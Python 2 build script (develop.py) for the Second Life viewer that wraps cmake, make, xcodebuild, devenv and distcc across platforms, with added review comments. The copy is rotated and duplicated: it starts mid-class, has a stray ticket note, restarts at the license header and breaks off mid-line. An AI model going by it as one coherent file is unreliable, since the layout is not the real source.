                '-DUNATTENDED:BOOL=%(unattended)s '
                '-DWORD_SIZE:STRING=%(word_size)s '
                '-DROOT_PROJECT_NAME:STRING=%(project_name)s '
                '%(universal)s '
                '%(opts)s %(dir)r' % args)

    def run_build(self, opts, targets):
        cwd = getcwd()
        if targets:
            targets = ' '.join(['-target ' + repr(t) for t in targets])
        else:
            targets = ''
        # Filter noisy 'setenv' lines from xcodebuild output while preserving
        # its exit status via PIPESTATUS (requires a bash-compatible shell).
        cmd = ('xcodebuild -configuration %s %s %s | grep -v "^[[:space:]]*setenv" ; exit ${PIPESTATUS[0]}' %
               (self.build_type, ' '.join(opts), targets))
        for d in self.build_dirs():
            try:
                os.chdir(d)
                print 'Running %r in %r' % (cmd, d)
                self.run(cmd)
            finally:
                os.chdir(cwd)
class WindowsSetup(PlatformSetup):
    """Windows build setup driving Visual Studio (or Incredibuild)."""
    # Map short generator aliases to the cmake generator name and the
    # registry version string used to locate the VS installation.
    gens = {
        'vc71' : {
            'gen' : r'Visual Studio 7 .NET 2003',
            'ver' : r'7.1'
            },
        'vc80' : {
            'gen' : r'Visual Studio 8 2005',
            'ver' : r'8.0'
            },
        'vc90' : {
            'gen' : r'Visual Studio 9 2008',
            'ver' : r'9.0'
            }
        }
    gens['vs2003'] = gens['vc71']
    gens['vs2005'] = gens['vc80']
    gens['vs2008'] = gens['vc90']

    search_path = r'C:\windows'
    exe_suffixes = ('.exe', '.bat', '.com')

    def __init__(self):
        super(WindowsSetup, self).__init__()
        self._generator = None
        self.incredibuild = False

    def _get_generator(self):
        # Lazily auto-detect an installed Visual Studio, preferring VC80.
        if self._generator is None:
            for version in 'vc80 vc90 vc71'.split():
                if self.find_visual_studio(version):
                    self._generator = version
                    print 'Building with ', self.gens[version]['gen']
                    break
            else:
                print >> sys.stderr, 'Cannot find a Visual Studio installation!'
                sys.exit(1)
        return self._generator

    def _set_generator(self, gen):
        self._generator = gen

    generator = property(_get_generator, _set_generator)

    def os(self):
        return 'win32'

    def build_dirs(self):
        return ['build-' + self.generator]

    def cmake_commandline(self, src_dir, build_dir, opts, simple):
        args = dict(
            dir=src_dir,
            generator=self.gens[self.generator.lower()]['gen'],
            opts=quote(opts),
            standalone=self.standalone,
            unattended=self.unattended,
            project_name=self.project_name,
            word_size=self.word_size,
            )
        #if simple:
        #    return 'cmake %(opts)s "%(dir)s"' % args
        return ('cmake -G "%(generator)s" '
                '-DSTANDALONE:BOOL=%(standalone)s '
                '-DUNATTENDED:BOOL=%(unattended)s '
                '-DWORD_SIZE:STRING=%(word_size)s '
                '-DROOT_PROJECT_NAME:STRING=%(project_name)s '
                '%(opts)s "%(dir)s"' % args)

    def get_HKLM_registry_value(self, key_str, value_str):
        # Read a single value from HKEY_LOCAL_MACHINE.
        import _winreg
        reg = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
        key = _winreg.OpenKey(reg, key_str)
        value = _winreg.QueryValueEx(key, value_str)[0]
        print 'Found: %s' % value
        return value

    def find_visual_studio(self, gen=None):
        # Return the VS environment directory from the registry, checking
        # the Wow6432Node hive as a fallback; '' if not installed.
        if gen is None:
            gen = self._generator
        gen = gen.lower()
        value_str = (r'EnvironmentDirectory')
        key_str = (r'SOFTWARE\Microsoft\VisualStudio\%s\Setup\VS' %
                   self.gens[gen]['ver'])
        print ('Reading VS environment from HKEY_LOCAL_MACHINE\%s\%s' %
               (key_str, value_str))
        try:
            return self.get_HKLM_registry_value(key_str, value_str)
        except WindowsError, err:
            # 64-bit Windows keeps 32-bit software keys under Wow6432Node.
            key_str = (r'SOFTWARE\Wow6432Node\Microsoft\VisualStudio\%s\Setup\VS' %
                       self.gens[gen]['ver'])

        try:
            return self.get_HKLM_registry_value(key_str, value_str)
        except:
            print >> sys.stderr, "Didn't find ", self.gens[gen]['gen']

        return ''

    def get_build_cmd(self):
        # Return (executable, command string) for the configured builder.
        if self.incredibuild:
            config = self.build_type
            if self.gens[self.generator]['ver'] in [ r'8.0', r'9.0' ]:
                config = '\"%s|Win32\"' % config
            # Look up buildconsole's absolute path for the executable
            # parameter (see DEV-44838 note elsewhere in this file).
            executable = self.find_in_path('buildconsole')[0]
            cmd = "%(bin)s %(prj)s.sln /build /cfg=%(cfg)s" % {'prj': self.project_name, 'cfg': config, 'bin': executable}
            return (executable, cmd)

        # devenv.com is CLI friendly, devenv.exe... not so much.
        executable = '%sdevenv.com' % (self.find_visual_studio(),)
        cmd = ('"%s" %s.sln /build %s' %
               (executable, self.project_name, self.build_type))
        return (executable, cmd)

    def run(self, command, name=None, retry_on=None, retries=1):
        '''Run a program.  If the program fails, raise an exception.'''
        assert name is not None, 'On windows an executable path must be given in name.'
        if not os.path.isfile(name):
            name = self.find_in_path(name)[0]
        # NOTE(review): the loop does not break after a successful call, so
        # with retries > 1 a command that succeeds is run again; and if the
        # final attempt fails with the retry_on status, no exception is
        # raised -- confirm both behaviors are intended.
        while retries:
            retries = retries - 1
            print "develop.py tries to run:", command
            ret = subprocess.call(command, executable=name)
            print "got ret", ret, "from", command
            if ret:
                if not name:
                    error = 'was not found'
                else:
                    error = 'exited with status %d' % ret
                if retry_on is not None and retry_on == ret:
                    print "Retrying... the command %r %s" % (name, error)
                else:
                    raise CommandError('the command %r %s' % (name, error))

    def run_cmake(self, args=[]):
        '''Override to add the vstool.exe call after running cmake.'''
        PlatformSetup.run_cmake(self, args)
        if self.unattended == 'OFF':
            self.run_vstool()

    def run_vstool(self):
        # Set the startup project and active config in each solution; a
        # stamp file avoids re-running when the build type is unchanged.
        for build_dir in self.build_dirs():
            stamp = os.path.join(build_dir, 'vstool.txt')
            try:
                prev_build = open(stamp).read().strip()
            except IOError:
                prev_build = ''
            if prev_build == self.build_type:
                # Only run vstool if the build type has changed.
                continue
            executable = os.path.join('tools','vstool','VSTool.exe')
            vstool_cmd = (executable +
                          ' --solution ' +
                          os.path.join(build_dir,'SecondLife.sln') +
                          ' --config ' + self.build_type +
                          ' --startup secondlife-bin')
            print 'Running %r in %r' % (vstool_cmd, getcwd())
            self.run(vstool_cmd, name=executable)
            print >> open(stamp, 'w'), self.build_type

    def run_build(self, opts, targets):
        cwd = getcwd()
        executable, build_cmd = self.get_build_cmd()
        for d in self.build_dirs():
            try:
                os.chdir(d)
                if targets:
                    for t in targets:
                        cmd = '%s /project %s %s' % (build_cmd, t, ' '.join(opts))
                        print 'Running %r in %r' % (cmd, d)
                        self.run(cmd, name=executable, retry_on=4, retries=3)
                else:
                    cmd = '%s %s' % (build_cmd, ' '.join(opts))
                    print 'Running %r in %r' % (cmd, d)
                    self.run(cmd, name=executable, retry_on=4, retries=3)
            finally:
                os.chdir(cwd)
class CygwinSetup(WindowsSetup):
    """Windows build driven from a Cygwin shell.

    Identical to WindowsSetup except that the source path must be
    translated to a DOS-style path (via cygpath) before being handed to
    the native cmake binary.
    """
    def __init__(self):
        super(CygwinSetup, self).__init__()
        self.generator = 'vc80'

    def cmake_commandline(self, src_dir, build_dir, opts, simple):
        # cmake is a native Windows program, so give it a DOS path.
        dos_dir = commands.getoutput("cygpath -w %s" % src_dir)
        args = dict(
            dir=dos_dir,
            generator=self.gens[self.generator.lower()]['gen'],
            opts=quote(opts),
            standalone=self.standalone,
            unattended=self.unattended,
            project_name=self.project_name,
            word_size=self.word_size,
            )
        #if simple:
        #    return 'cmake %(opts)s "%(dir)s"' % args
        # Fix: the UNATTENDED type tag was misspelled 'BOOl' (lowercase
        # ell); use the canonical 'BOOL' spelling as everywhere else.
        return ('cmake -G "%(generator)s" '
                '-DUNATTENDED:BOOL=%(unattended)s '
                '-DSTANDALONE:BOOL=%(standalone)s '
                '-DWORD_SIZE:STRING=%(word_size)s '
                '-DROOT_PROJECT_NAME:STRING=%(project_name)s '
                '%(opts)s "%(dir)s"' % args)
# Dispatch table: sys.platform value -> platform setup class.
setup_platform = {
    'darwin': DarwinSetup,
    'linux2': LinuxSetup,
    'win32' : WindowsSetup,
    'cygwin' : CygwinSetup
    }
usage_msg = '''
Usage: develop.py [options] [command [command-options]]
Options:
-h | --help print this help message
--standalone build standalone, without Linden prebuild libraries
--unattended build unattended, do not invoke any tools requiring
a human response
--universal build a universal binary on Mac OS X (unsupported)
-t | --type=NAME build type ("Debug", "Release", or "RelWithDebInfo")
-m32 | -m64 build architecture (32-bit or 64-bit)
-N | --no-distcc disable use of distcc
-G | --generator=NAME generator name
Windows: VC71 or VS2003 (default), VC80 (VS2005) or
VC90 (VS2008)
Mac OS X: Xcode (default), Unix Makefiles
Linux: Unix Makefiles (default), KDevelop3
-p | --project=NAME set the root project name. (Doesn't effect makefiles)
Commands:
build configure and build default target
clean delete all build directories, does not affect sources
configure configure project by running cmake (default command if none given)
Command-options for "configure":
We use cmake variables to change the build configuration.
-DSERVER:BOOL=OFF Don't configure simulator/dataserver/etc
-DVIEWER:BOOL=OFF Don't configure the viewer
-DPACKAGE:BOOL=ON Create "package" target to make installers
-DLOCALIZESETUP:BOOL=ON Create one win_setup target per supported language
Examples:
Set up a viewer-only project for your system:
develop.py configure -DSERVER:BOOL=OFF
Set up a Visual Studio 2005 project with "package" target:
develop.py -G vc80 configure -DPACKAGE:BOOL=ON
'''
def main(arguments):
    """Parse command-line options, then dispatch to configure/build/clean."""
    # Ensure distcc has a writable state directory even when unconfigured.
    if os.getenv('DISTCC_DIR') is None:
        distcc_dir = os.path.join(getcwd(), '.distcc')
        if not os.path.exists(distcc_dir):
            os.mkdir(distcc_dir)
        print "setting DISTCC_DIR to %s" % distcc_dir
        os.environ['DISTCC_DIR'] = distcc_dir
    else:
        print "DISTCC_DIR is set to %s" % os.getenv('DISTCC_DIR')

    # Pick the platform-specific setup class (KeyError on unknown platform).
    setup = setup_platform[sys.platform]()
    try:
        opts, args = getopt.getopt(
            arguments,
            '?hNt:p:G:m:',
            ['help', 'standalone', 'no-distcc', 'unattended', 'universal', 'type=', 'incredibuild', 'generator=', 'project='])
    except getopt.GetoptError, err:
        print >> sys.stderr, 'Error:', err
        print >> sys.stderr, """
Note: You must pass -D options to cmake after the "configure" command
For example: develop.py configure -DSERVER:BOOL=OFF"""
        print >> sys.stderr, usage_msg.strip()
        sys.exit(1)

    for o, a in opts:
        if o in ('-?', '-h', '--help'):
            print usage_msg.strip()
            sys.exit(0)
        elif o in ('--standalone',):
            setup.standalone = 'ON'
        elif o in ('--unattended',):
            setup.unattended = 'ON'
        elif o in ('--universal',):
            setup.universal = 'ON'
        elif o in ('-m',):
            if a in ('32', '64'):
                setup.word_size = int(a)
            else:
                print >> sys.stderr, 'Error: unknown word size', repr(a)
                print >> sys.stderr, 'Supported word sizes: 32, 64'
                sys.exit(1)
        elif o in ('-t', '--type'):
            try:
                setup.build_type = setup.build_types[a.lower()]
            except KeyError:
                print >> sys.stderr, 'Error: unknown build type', repr(a)
                print >> sys.stderr, 'Supported build types:'
                types = setup.build_types.values()
                types.sort()
                for t in types:
                    print ' ', t
                sys.exit(1)
        elif o in ('-G', '--generator'):
            setup.generator = a
        elif o in ('-N', '--no-distcc'):
            setup.distcc = False
        elif o in ('-p', '--project'):
            setup.project_name = a
        elif o in ('--incredibuild'):
            # NOTE(review): '(--incredibuild)' is a parenthesized string,
            # not a tuple, so this is a substring test -- it matches here
            # but the trailing comma is missing; confirm intended.
            setup.incredibuild = True
        else:
            print >> sys.stderr, 'INTERNAL ERROR: unhandled option', repr(o)
            sys.exit(1)

    if not args:
        # No subcommand given: default to configure.
        setup.run_cmake()
        return

    try:
        cmd = args.pop(0)
        if cmd in ('cmake', 'configure'):
            setup.run_cmake(args)
        elif cmd == 'build':
            # Require an existing configure step before building.
            for d in setup.build_dirs():
                if not os.path.exists(d):
                    raise CommandError('run "develop.py cmake" first')
            setup.run_cmake()
            opts, targets = setup.parse_build_opts(args)
            setup.run_build(opts, targets)
        elif cmd == 'clean':
            if args:
                raise CommandError('clean takes no arguments')
            setup.cleanup()
        else:
            print >> sys.stderr, 'Error: unknown subcommand', repr(cmd)
            print >> sys.stderr, "(run 'develop.py --help' for help)"
            sys.exit(1)
    except getopt.GetoptError, err:
        print >> sys.stderr, 'Error with %r subcommand: %s' % (cmd, err)
        sys.exit(1)
if __name__ == '__main__':
    try:
        main(sys.argv[1:])
    except CommandError, err:
        # Expected build failures print a tidy message, not a traceback.
        print >> sys.stderr, 'Error:', err
        sys.exit(1)
DEV-44838 - See if buildconsole is confused by having the absolute path (with spaces) on the command line. To accomplish this, we put relative paths in the command string but look up the absolute path for the executable parameter.
#!/usr/bin/env python
#
# @file develop.py
# @authors Bryan O'Sullivan, Mark Palange, Aaron Brashears
# @brief Fire and forget script to appropriately configure cmake for SL.
#
# $LicenseInfo:firstyear=2007&license=viewergpl$
#
# Copyright (c) 2007-2009, Linden Research, Inc.
#
# Second Life Viewer Source Code
# The source code in this file ("Source Code") is provided by Linden Lab
# to you under the terms of the GNU General Public License, version 2.0
# ("GPL"), unless you have obtained a separate licensing agreement
# ("Other License"), formally executed by you and Linden Lab. Terms of
# the GPL can be found in doc/GPL-license.txt in this distribution, or
# online at http://secondlifegrid.net/programs/open_source/licensing/gplv2
#
# There are special exceptions to the terms and conditions of the GPL as
# it is applied to this Source Code. View the full text of the exception
# in the file doc/FLOSS-exception.txt in this software distribution, or
# online at
# http://secondlifegrid.net/programs/open_source/licensing/flossexception
#
# By copying, modifying or distributing this software, you acknowledge
# that you have read and understood your obligations described above,
# and agree to abide by those obligations.
#
# ALL LINDEN LAB SOURCE CODE IS PROVIDED "AS IS." LINDEN LAB MAKES NO
# WARRANTIES, EXPRESS, IMPLIED OR OTHERWISE, REGARDING ITS ACCURACY,
# COMPLETENESS OR PERFORMANCE.
# $/LicenseInfo$
import errno
import getopt
import os
import random
import re
import shutil
import socket
import sys
import commands
import subprocess
class CommandError(Exception):
    """Raised when an external build command fails or cannot be found."""
def mkdir(path):
    """Create path and return it; return None (falsy) when it already
    exists as a directory.  run_cmake relies on this truthiness to tell
    freshly created build directories from pre-existing ones."""
    try:
        os.mkdir(path)
        return path
    except OSError, err:
        # Swallow 'already exists' only when it really is a directory;
        # re-raise everything else (permissions, file in the way, ...).
        if err.errno != errno.EEXIST or not os.path.isdir(path):
            raise
def getcwd():
    """Return the current directory, upper-casing a DOS drive letter.

    CMake wants DOS drive letters to be in uppercase.  On platforms whose
    paths always begin with a slash the drive-letter test never matches,
    so no explicit Windows check is needed.
    """
    path = os.getcwd()
    has_lower_drive = 'a' <= path[0] <= 'z' and path[1] == ':'
    if has_lower_drive:
        return path[0].upper() + path[1:]
    return path
def quote(opts):
    """Wrap each option in double quotes and join with spaces.

    Embedded double quotes are stripped rather than escaped.  An empty
    list yields the two-character string '""'.
    """
    stripped = [opt.replace('"', '') for opt in opts]
    return '"%s"' % '" "'.join(stripped)
class PlatformSetup(object):
    """Abstract base class driving cmake configure, build and clean."""
    generator = None

    # Map lowercased build-type aliases to their canonical spellings.
    build_types = {}
    for t in ('Debug', 'Release', 'RelWithDebInfo'):
        build_types[t.lower()] = t

    # Defaults; main() overrides these from command-line options.
    build_type = build_types['relwithdebinfo']
    standalone = 'OFF'
    unattended = 'OFF'
    universal = 'OFF'
    project_name = 'SecondLife'
    distcc = True
    cmake_opts = []
    word_size = 32

    def __init__(self):
        # Directory containing this script; used by is_internal_tree().
        self.script_dir = os.path.realpath(
            os.path.dirname(__import__(__name__).__file__))

    def os(self):
        '''Return the name of the OS.'''
        # NOTE(review): this raises the NotImplemented singleton, not
        # NotImplementedError -- it still aborts, but with a TypeError-ish
        # failure rather than the conventional exception; confirm intended.
        raise NotImplemented('os')

    def arch(self):
        '''Return the CPU architecture.'''
        return None

    def platform(self):
        '''Return a stringified two-tuple of the OS name and CPU
        architecture.'''
        ret = self.os()
        if self.arch():
            ret += '-' + self.arch()
        return ret

    def build_dirs(self):
        '''Return the top-level directories in which builds occur.
        This can return more than one directory, e.g. if doing a
        32-bit viewer and server build on Linux.'''
        return ['build-' + self.platform()]

    def cmake_commandline(self, src_dir, build_dir, opts, simple):
        '''Return the command line to run cmake with.'''
        args = dict(
            dir=src_dir,
            generator=self.generator,
            opts=quote(opts),
            standalone=self.standalone,
            unattended=self.unattended,
            word_size=self.word_size,
            type=self.build_type.upper(),
            )
        #if simple:
        #    return 'cmake %(opts)s %(dir)r' % args
        return ('cmake -DCMAKE_BUILD_TYPE:STRING=%(type)s '
                '-DSTANDALONE:BOOL=%(standalone)s '
                '-DUNATTENDED:BOOL=%(unattended)s '
                '-DWORD_SIZE:STRING=%(word_size)s '
                '-G %(generator)r %(opts)s %(dir)r' % args)

    def run_cmake(self, args=[]):
        '''Run cmake.'''

        # do a sanity check to make sure we have a generator
        if not hasattr(self, 'generator'):
            # NOTE(review): string exceptions are Python-2-only, and
            # self.__name__ does not exist on instances -- this error path
            # would itself fail; confirm it is effectively unreachable.
            raise "No generator available for '%s'" % (self.__name__,)
        cwd = getcwd()
        created = []
        try:
            for d in self.build_dirs():
                simple = True
                if mkdir(d):
                    # mkdir() returns the path only when it created it.
                    created.append(d)
                    simple = False
                try:
                    os.chdir(d)
                    cmd = self.cmake_commandline(cwd, d, args, simple)
                    print 'Running %r in %r' % (cmd, d)
                    self.run(cmd, 'cmake')
                finally:
                    os.chdir(cwd)
        except:
            # If we created a directory in which to run cmake and
            # something went wrong, the directory probably just
            # contains garbage, so delete it.
            os.chdir(cwd)
            for d in created:
                print 'Cleaning %r' % d
                shutil.rmtree(d)
            raise

    def parse_build_opts(self, arguments):
        # Split '-o/--option' pass-through values from positional targets.
        opts, targets = getopt.getopt(arguments, 'o:', ['option='])
        build_opts = []
        for o, a in opts:
            if o in ('-o', '--option'):
                build_opts.append(a)
        return build_opts, targets

    def run_build(self, opts, targets):
        '''Build the default targets for this platform.'''
        # NOTE(review): same NotImplemented-vs-NotImplementedError issue
        # as os() above.
        raise NotImplemented('run_build')

    def cleanup(self):
        '''Delete all build directories.'''
        cleaned = 0
        for d in self.build_dirs():
            if os.path.isdir(d):
                print 'Cleaning %r' % d
                shutil.rmtree(d)
                cleaned += 1
        if not cleaned:
            print 'Nothing to clean up!'

    def is_internal_tree(self):
        '''Indicate whether we are building in an internal source tree.'''
        return os.path.isdir(os.path.join(self.script_dir, 'newsim'))

    def find_in_path(self, name, defval=None, basename=False):
        # Locate an executable on PATH (or the class search_path), trying
        # each platform suffix.  Returns a one-element list (the path, or
        # its basename when basename=True), [defval] if given, else [] --
        # a list so callers can concatenate it with other command pieces.
        for ext in self.exe_suffixes:
            name_ext = name + ext
            if os.sep in name_ext:
                # Already looks like a path; resolve it directly.
                path = os.path.abspath(name_ext)
                if os.access(path, os.X_OK):
                    return [basename and os.path.basename(path) or path]
            for p in os.getenv('PATH', self.search_path).split(os.pathsep):
                path = os.path.join(p, name_ext)
                if os.access(path, os.X_OK):
                    return [basename and os.path.basename(path) or path]
        if defval:
            return [defval]
        return []
class UnixSetup(PlatformSetup):
    '''Generic Unixy build instructions.'''
    search_path = '/usr/bin:/usr/local/bin'
    exe_suffixes = ('',)

    def __init__(self):
        super(UnixSetup, self).__init__()
        self.generator = 'Unix Makefiles'

    def os(self):
        return 'unix'

    def arch(self):
        # Normalize uname's machine field to a small set of CPU names.
        cpu = os.uname()[-1]
        if cpu.endswith('386'):
            cpu = 'i386'
        elif cpu.endswith('86'):
            cpu = 'i686'
        elif cpu in ('athlon',):
            cpu = 'i686'
        elif cpu == 'Power Macintosh':
            cpu = 'ppc'
        elif cpu == 'x86_64' and self.word_size == 32:
            # A 32-bit build was requested on a 64-bit host.
            cpu = 'i686'
        return cpu

    def run(self, command, name=None):
        '''Run a program.  If the program fails, raise an exception.'''
        sys.stdout.flush()
        ret = os.system(command)
        if ret:
            if name is None:
                name = command.split(None, 1)[0]
            # Decode the 16-bit os.system() status into a readable message.
            if os.WIFEXITED(ret):
                st = os.WEXITSTATUS(ret)
                if st == 127:
                    # Shell convention: exit status 127 = command not found.
                    event = 'was not found'
                else:
                    event = 'exited with status %d' % st
            elif os.WIFSIGNALED(ret):
                event = 'was killed by signal %d' % os.WTERMSIG(ret)
            else:
                event = 'died unexpectedly (!?) with 16-bit status %d' % ret
            raise CommandError('the command %r %s' %
                               (name, event))
class LinuxSetup(UnixSetup):
    """Linux build setup: picks compilers (optionally via distcc) and
    builds separate viewer/server trees in internal checkouts."""
    def __init__(self):
        super(LinuxSetup, self).__init__()
        try:
            # Debian Sarge (version "3.1") ships the older toolchain; the
            # server build selects g++-3.3 based on this flag.
            self.debian_sarge = open('/etc/debian_version').read().strip() == '3.1'
        except:
            # Not Debian, or the version file is unreadable.
            self.debian_sarge = False

    def os(self):
        return 'linux'

    def build_dirs(self):
        # Only build the server code if we have it.
        platform_build = '%s-%s' % (self.platform(), self.build_type.lower())
        if self.arch() == 'i686' and self.is_internal_tree():
            return ['viewer-' + platform_build, 'server-' + platform_build]
        elif self.arch() == 'x86_64' and self.is_internal_tree():
            # the viewer does not build in 64bit -- kdu5 issues
            # we can either use openjpeg, or overhaul our viewer to handle kdu5 or higher
            # doug knows about kdu issues
            return ['server-' + platform_build]
        else:
            return ['viewer-' + platform_build]

    def cmake_commandline(self, src_dir, build_dir, opts, simple):
        # Assemble the cmake invocation; for internal trees also choose a
        # C++ compiler (optionally wrapped in distcc) passed via CXX.
        args = dict(
            dir=src_dir,
            generator=self.generator,
            opts=quote(opts),
            standalone=self.standalone,
            unattended=self.unattended,
            type=self.build_type.upper(),
            project_name=self.project_name,
            word_size=self.word_size,
            )
        if not self.is_internal_tree():
            args.update({'cxx':'g++', 'server':'OFF', 'viewer':'ON'})
        else:
            if self.distcc:
                distcc = self.find_in_path('distcc')
                baseonly = True
            else:
                distcc = []
                baseonly = False
            if 'server' in build_dir:
                # Server tree: Sarge needs g++-3.3, everything else g++-4.1.
                gcc = distcc + self.find_in_path(
                    self.debian_sarge and 'g++-3.3' or 'g++-4.1',
                    'g++', baseonly)
                args.update({'cxx': ' '.join(gcc), 'server': 'ON',
                             'viewer': 'OFF'})
            else:
                gcc41 = distcc + self.find_in_path('g++-4.1', 'g++', baseonly)
                args.update({'cxx': ' '.join(gcc41),
                             'server': 'OFF',
                             'viewer': 'ON'})
        cmd = (('cmake -DCMAKE_BUILD_TYPE:STRING=%(type)s '
                '-G %(generator)r -DSERVER:BOOL=%(server)s '
                '-DVIEWER:BOOL=%(viewer)s -DSTANDALONE:BOOL=%(standalone)s '
                '-DUNATTENDED:BOOL=%(unattended)s '
                '-DWORD_SIZE:STRING=%(word_size)s '
                '-DROOT_PROJECT_NAME:STRING=%(project_name)s '
                '%(opts)s %(dir)r')
               % args)
        if 'CXX' not in os.environ:
            # Only force a compiler when the user has not chosen one.
            args.update({'cmd':cmd})
            cmd = ('CXX=%(cxx)r %(cmd)s' % args)
        return cmd

    def run_build(self, opts, targets):
        # Honor an explicit -j option in opts; otherwise size the job count
        # from the distcc host list (falling back to local CPU count).
        job_count = None

        for i in range(len(opts)):
            if opts[i].startswith('-j'):
                try:
                    # '-jN' form.
                    job_count = int(opts[i][2:])
                except ValueError:
                    try:
                        # '-j N' form (value in the next element).
                        job_count = int(opts[i+1])
                    except ValueError:
                        # Bare '-j': flag seen but no count given.
                        job_count = True

        def get_cpu_count():
            # Count 'processor' stanzas in /proc/cpuinfo.
            count = 0
            for line in open('/proc/cpuinfo'):
                if re.match(r'processor\s*:', line):
                    count += 1
            return count

        def localhost():
            # distcc-style entry for the local machine plus its CPU count.
            count = get_cpu_count()
            return 'localhost/' + str(count), count

        def get_distcc_hosts():
            # Read the distcc hosts file; fall back to $DISTCC_HOSTS or the
            # local machine if it is missing.
            try:
                hosts = []
                name = os.getenv('DISTCC_DIR', '/etc/distcc') + '/hosts'
                for l in open(name):
                    l = l[l.find('#')+1:].strip()
                    if l: hosts.append(l)
                return hosts
            except IOError:
                return (os.getenv('DISTCC_HOSTS', '').split() or
                        [localhost()[0]])

        def count_distcc_hosts():
            # Tally hosts and CPUs; hosts without a '/N' suffix count as 1 CPU.
            cpus = 0
            hosts = 0
            for host in get_distcc_hosts():
                m = re.match(r'.*/(\d+)', host)
                hosts += 1
                cpus += m and int(m.group(1)) or 1
            return hosts, cpus

        def mk_distcc_hosts(basename, range, num_cpus):
            '''Generate a list of LL-internal machines to build on.'''
            loc_entry, cpus = localhost()
            hosts = [loc_entry]
            dead = []
            stations = [s for s in xrange(range) if s not in dead]
            random.shuffle(stations)
            hosts += ['%s%d.lindenlab.com/%d,lzo' % (basename, s, num_cpus) for s in stations]
            cpus += 2 * len(stations)
            return ' '.join(hosts), cpus

        if job_count is None:
            hosts, job_count = count_distcc_hosts()
            hostname = socket.gethostname()
            if hosts == 1:
                # Only the local host is configured; expand to the internal
                # build farm when running on a recognized machine class.
                if hostname.startswith('station'):
                    hosts, job_count = mk_distcc_hosts('station', 36, 2)
                    os.environ['DISTCC_HOSTS'] = hosts
                if hostname.startswith('eniac'):
                    hosts, job_count = mk_distcc_hosts('eniac', 71, 2)
                    os.environ['DISTCC_HOSTS'] = hosts
            if hostname.startswith('build'):
                max_jobs = 6
            else:
                max_jobs = 12
            if job_count > max_jobs:
                job_count = max_jobs;
            opts.extend(['-j', str(job_count)])

        if targets:
            targets = ' '.join(targets)
        else:
            targets = 'all'

        for d in self.build_dirs():
            cmd = 'make -C %r %s %s' % (d, ' '.join(opts), targets)
            print 'Running %r' % cmd
            self.run(cmd)
class DarwinSetup(UnixSetup):
    """Mac OS X build setup using the Xcode cmake generator."""
    def __init__(self):
        super(DarwinSetup, self).__init__()
        self.generator = 'Xcode'

    def os(self):
        return 'darwin'

    def arch(self):
        # Universal builds are reported as a pseudo-architecture.
        if self.universal == 'ON':
            return 'universal'
        else:
            return UnixSetup.arch(self)

    def cmake_commandline(self, src_dir, build_dir, opts, simple):
        args = dict(
            dir=src_dir,
            generator=self.generator,
            opts=quote(opts),
            standalone=self.standalone,
            word_size=self.word_size,
            unattended=self.unattended,
            project_name=self.project_name,
            universal=self.universal,
            type=self.build_type.upper(),
            )
        if self.universal == 'ON':
            # Replace the flag value with the actual cmake option text.
            args['universal'] = '-DCMAKE_OSX_ARCHITECTURES:STRING=\'i386;ppc\''
        #if simple:
        #    return 'cmake %(opts)s %(dir)r' % args
        return ('cmake -G %(generator)r '
                '-DCMAKE_BUILD_TYPE:STRING=%(type)s '
                '-DSTANDALONE:BOOL=%(standalone)s '
                '-DUNATTENDED:BOOL=%(unattended)s '
                '-DWORD_SIZE:STRING=%(word_size)s '
                '-DROOT_PROJECT_NAME:STRING=%(project_name)s '
                '%(universal)s '
                '%(opts)s %(dir)r' % args)

    def run_build(self, opts, targets):
        cwd = getcwd()
        if targets:
            targets = ' '.join(['-target ' + repr(t) for t in targets])
        else:
            targets = ''
        # Filter noisy 'setenv' lines from xcodebuild output while preserving
        # its exit status via PIPESTATUS (requires a bash-compatible shell).
        cmd = ('xcodebuild -configuration %s %s %s | grep -v "^[[:space:]]*setenv" ; exit ${PIPESTATUS[0]}' %
               (self.build_type, ' '.join(opts), targets))
        for d in self.build_dirs():
            try:
                os.chdir(d)
                print 'Running %r in %r' % (cmd, d)
                self.run(cmd)
            finally:
                os.chdir(cwd)
class WindowsSetup(PlatformSetup):
    """Windows build setup driving Visual Studio (or Incredibuild)."""
    # Map short generator aliases to the cmake generator name and the
    # registry version string used to locate the VS installation.
    gens = {
        'vc71' : {
            'gen' : r'Visual Studio 7 .NET 2003',
            'ver' : r'7.1'
            },
        'vc80' : {
            'gen' : r'Visual Studio 8 2005',
            'ver' : r'8.0'
            },
        'vc90' : {
            'gen' : r'Visual Studio 9 2008',
            'ver' : r'9.0'
            }
        }
    gens['vs2003'] = gens['vc71']
    gens['vs2005'] = gens['vc80']
    gens['vs2008'] = gens['vc90']

    search_path = r'C:\windows'
    exe_suffixes = ('.exe', '.bat', '.com')

    def __init__(self):
        super(WindowsSetup, self).__init__()
        self._generator = None
        self.incredibuild = False

    def _get_generator(self):
        # Lazily auto-detect an installed Visual Studio, preferring VC80.
        if self._generator is None:
            for version in 'vc80 vc90 vc71'.split():
                if self.find_visual_studio(version):
                    self._generator = version
                    print 'Building with ', self.gens[version]['gen']
                    break
            else:
                print >> sys.stderr, 'Cannot find a Visual Studio installation!'
                sys.exit(1)
        return self._generator

    def _set_generator(self, gen):
        self._generator = gen

    generator = property(_get_generator, _set_generator)

    def os(self):
        return 'win32'

    def build_dirs(self):
        return ['build-' + self.generator]

    def cmake_commandline(self, src_dir, build_dir, opts, simple):
        args = dict(
            dir=src_dir,
            generator=self.gens[self.generator.lower()]['gen'],
            opts=quote(opts),
            standalone=self.standalone,
            unattended=self.unattended,
            project_name=self.project_name,
            word_size=self.word_size,
            )
        #if simple:
        #    return 'cmake %(opts)s "%(dir)s"' % args
        return ('cmake -G "%(generator)s" '
                '-DSTANDALONE:BOOL=%(standalone)s '
                '-DUNATTENDED:BOOL=%(unattended)s '
                '-DWORD_SIZE:STRING=%(word_size)s '
                '-DROOT_PROJECT_NAME:STRING=%(project_name)s '
                '%(opts)s "%(dir)s"' % args)

    def get_HKLM_registry_value(self, key_str, value_str):
        # Read a single value from HKEY_LOCAL_MACHINE.
        import _winreg
        reg = _winreg.ConnectRegistry(None, _winreg.HKEY_LOCAL_MACHINE)
        key = _winreg.OpenKey(reg, key_str)
        value = _winreg.QueryValueEx(key, value_str)[0]
        print 'Found: %s' % value
        return value

    def find_visual_studio(self, gen=None):
        # Return the VS environment directory from the registry, checking
        # the Wow6432Node hive as a fallback; '' if not installed.
        if gen is None:
            gen = self._generator
        gen = gen.lower()
        value_str = (r'EnvironmentDirectory')
        key_str = (r'SOFTWARE\Microsoft\VisualStudio\%s\Setup\VS' %
                   self.gens[gen]['ver'])
        print ('Reading VS environment from HKEY_LOCAL_MACHINE\%s\%s' %
